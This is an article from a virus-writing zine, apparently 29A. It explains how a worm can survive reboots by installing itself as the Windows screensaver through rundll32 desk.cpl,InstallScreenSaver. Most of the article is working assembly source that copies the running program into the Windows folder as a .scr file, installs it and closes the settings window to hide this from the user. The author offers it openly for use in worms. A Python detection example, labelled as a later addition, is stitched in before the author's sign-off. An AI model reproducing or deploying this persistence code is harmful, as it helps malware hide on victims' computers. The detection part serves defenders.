www.pudn.com > 29a_fu.zip > 29A-7.030
_______________________________________________________________________
New way to startup files - ShellExecute InstallScreenSaver API
By: SWaNk
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
____________
Introduction
¯¯¯¯¯¯¯¯¯¯¯¯
Lo ppl, this is my first tutorial for 29A. First of all, forgive my
terrible English, I'm Brazilian.
In this article I'll explain how to install a screen saver on the
victim's computer. Why? Because it can be used to start up
worms/viruses without using the most common ways like "Run" or "RunOnce",
without touching the registry or ini files yourself.
__________
Explaining
¯¯¯¯¯¯¯¯¯¯
A few days ago, I was walking through my registry and I found
something that caught my attention.
[HKEY_CLASSES_ROOT\scrfile\shell\install\command]
@="C:\\WINDOWS\\rundll32.exe desk.cpl,InstallScreenSaver %l"
Well, I started to think.. rundll32.. scrfile.. InstallScreenSaver..
it could be used in a ShellExecute API call!
Now it's easy, just follow the steps:
- Find the windows root
- Create one .SCR file at the Windows root (that's just the basics; you can
make it more interesting by infecting all the .SCR files and picking
one at random from the Windows root to install)
- Call the API
With this, when the screen saver runs, the worm runs too. If the
user opens the Screen Saver tab to change it and clicks the Preview button,
it runs again.. think about the possibilities. Now it's up to your
sick mind..
PS: We have one small problem. When the worm calls the API, it opens
the screen saver window from Control Panel.
You can leave it and let the user close the window, or use 2 APIs
to close the fucking delator. See the sample source code below for
details:
;______________________________________________________________________
; example Source code
;¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
        .386p
        .model FLAT

        extrn ExitProcess          : PROC
        extrn ShellExecuteA        : PROC
        extrn SetCurrentDirectoryA : PROC     ; imported but not used in this sample
        extrn GetWindowsDirectoryA : PROC
        extrn lstrcatA             : PROC
        extrn MessageBoxA          : PROC
        extrn CopyFileA            : PROC
        extrn GetModuleFileNameA   : PROC
        extrn PostMessageA         : PROC
        extrn FindWindowA          : PROC

        .data
PropVideo  db 'Propriedades de Vídeo',0       ; "Display Properties" dialog title (Portuguese Windows)
Message    db "running again..",0
open       db "open",0
rundll32   db "rundll32.exe",0
InstallSS  db "desk.cpl,InstallScreenSaver "   ; rundll32 parameters; the full .scr path is appended below
           db 256 dup(0)                       ; room for that path (the original string had no slack
                                               ; after it, so the lstrcat below overflowed into SSaver)
SSaver     db "SWaNk.scr",0

        .data?
MainDir    db 256 dup(?)
WindowsDir db 256 dup(?)

        .code
start:
        push    256
        push    offset MainDir
        push    0
        call    GetModuleFileNameA             ; full path of this executable -> MainDir

        push    256
        push    offset WindowsDir
        call    GetWindowsDirectoryA           ; "C:\WINDOWS" -> WindowsDir, EAX = length
        mov     byte ptr [WindowsDir+eax], '\' ; append '\' (the byte after it is already 0 in .data?)

        push    offset SSaver
        push    offset WindowsDir
        call    lstrcatA                       ; WindowsDir = "C:\WINDOWS\SWaNk.scr"

        push    1                              ; bFailIfExists
        push    offset WindowsDir
        push    offset MainDir
        call    CopyFileA                      ; copy the worm to the Windows root

        push    offset WindowsDir
        push    offset InstallSS
        call    lstrcatA                       ; InstallSS = "desk.cpl,InstallScreenSaver C:\WINDOWS\SWaNk.scr"

        push    1                              ; nShowCmd = SW_SHOWNORMAL
        push    0                              ; lpDirectory = NULL
        push    offset InstallSS               ; lpParameters
        push    offset rundll32                ; lpFile
        push    offset open                    ; lpOperation
        push    0                              ; hwnd = NULL
        call    ShellExecuteA                  ; install the worm as screen saver

search:
        mov     eax, offset PropVideo          ; window title, change it to your language
        push    eax                            ; lpWindowName
        cdq                                    ; EDX = 0 (EAX is a small positive address)
        push    edx                            ; lpClassName = NULL
        call    FindWindowA
        xchg    eax, ecx                       ; ECX = window handle, or 0
        jecxz   search                         ; not found yet, search again

        xor     edx, edx                       ; EDX is caller-saved, don't trust it after the call
        push    edx                            ; lParam = 0
        push    edx                            ; wParam = 0
        push    12h                            ; WM_QUIT
        push    ecx                            ; hwnd
        call    PostMessageA                   ; post the message that closes the window. Tnx Benny!

        push    0
        push    offset Message
        push    offset Message
        push    0
        call    MessageBoxA                    ; Just one message..

        push    0
        call    ExitProcess                    ; piss off!
        end     start
;______________________________________________________________________
; -eof-
;¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
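From the defender's side, this trick is not as quiet as it looks: desk.cpl's InstallScreenSaver records the chosen saver as the SCRNSAVE.EXE value under HKCU\Control Panel\Desktop, and the rundll32 command line itself lands in process-creation logs. The Python below is an added example (not from this article or from 29A) that flags both signs: a screensaver path sitting in the Windows root instead of system32, and rundll32 desk.cpl,InstallScreenSaver launched by something other than Explorer. The log format, field names, sample records and the "expected parent is explorer.exe" rule are all constructed assumptions to tune for your own telemetry.

```python
"""Added detection example for the screensaver-install persistence trick above.
Log format, field names and sample records are constructed, not real telemetry."""
import ntpath
import re

# The exact call the article's code issues: rundll32 loading desk.cpl,InstallScreenSaver <path>.
INSTALL_RE = re.compile(
    r'rundll32(?:\.exe)?"?\s+desk\.cpl\s*,\s*InstallScreenSaver\s+"?(?P<target>[^"]+?)"?\s*$',
    re.IGNORECASE)


def expected_scr_dirs(windows_dir):
    """Where a legitimately installed .scr normally lives (system32 / SysWOW64)."""
    root = windows_dir.rstrip("\\").lower()
    return {root + "\\system32", root + "\\syswow64"}


def assess_scr_path(path, windows_dir="C:\\WINDOWS"):
    """Findings for a screensaver path, e.g. the SCRNSAVE.EXE value that desk.cpl
    writes under HKCU\\Control Panel\\Desktop when it installs a saver."""
    findings = []
    clean = path.strip().strip('"')
    directory = ntpath.dirname(clean).lower()
    if not clean.lower().endswith(".scr"):
        findings.append("target is not a .scr file")
    if directory == windows_dir.rstrip("\\").lower():
        findings.append("screensaver placed directly in the Windows root")
    elif directory and directory not in expected_scr_dirs(windows_dir):
        findings.append("screensaver outside system32/SysWOW64")
    return findings


def scan_process_log(lines, windows_dir="C:\\WINDOWS"):
    """One process-creation record per line as key=value pairs joined by '|' (constructed
    format). Returns one alert per InstallScreenSaver call; an empty reason list means benign."""
    alerts = []
    for line in lines:
        fields = dict(kv.split("=", 1) for kv in line.split("|") if "=" in kv)
        match = INSTALL_RE.search(fields.get("CommandLine", ""))
        if not match:
            continue
        reasons = assess_scr_path(match.group("target"), windows_dir)
        parent = ntpath.basename(fields.get("ParentImage", "")).lower()
        # Assumption: a user installing a saver from Explorer's context menu has explorer.exe as parent.
        if parent != "explorer.exe":
            reasons.append("launched by unexpected parent " + (parent or "<unknown>"))
        alerts.append({"target": match.group("target"), "parent": parent, "reasons": reasons})
    return alerts


# Constructed sample records: the worm's install, a user's normal install, and unrelated noise.
SAMPLE_LOG = [
    "Image=C:\\WINDOWS\\rundll32.exe|CommandLine=rundll32.exe desk.cpl,InstallScreenSaver C:\\WINDOWS\\SWaNk.scr|ParentImage=C:\\Users\\bob\\Downloads\\photo.exe",
    "Image=C:\\WINDOWS\\system32\\rundll32.exe|CommandLine=\"C:\\WINDOWS\\system32\\rundll32.exe\" desk.cpl,InstallScreenSaver C:\\WINDOWS\\system32\\Bubbles.scr|ParentImage=C:\\WINDOWS\\explorer.exe",
    "Image=C:\\WINDOWS\\system32\\notepad.exe|CommandLine=notepad.exe notes.txt|ParentImage=C:\\WINDOWS\\explorer.exe",
]
```

Running `scan_process_log(SAMPLE_LOG)` yields two alerts: the first record is flagged for a saver in the Windows root and a non-Explorer parent, the second carries an empty reason list.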
Well, that's all! I hope this article helps you. cya!
"Quem refresca cu de pato é lagoa.." ("what cools a duck's ass is a lagoon..") (SWaNk)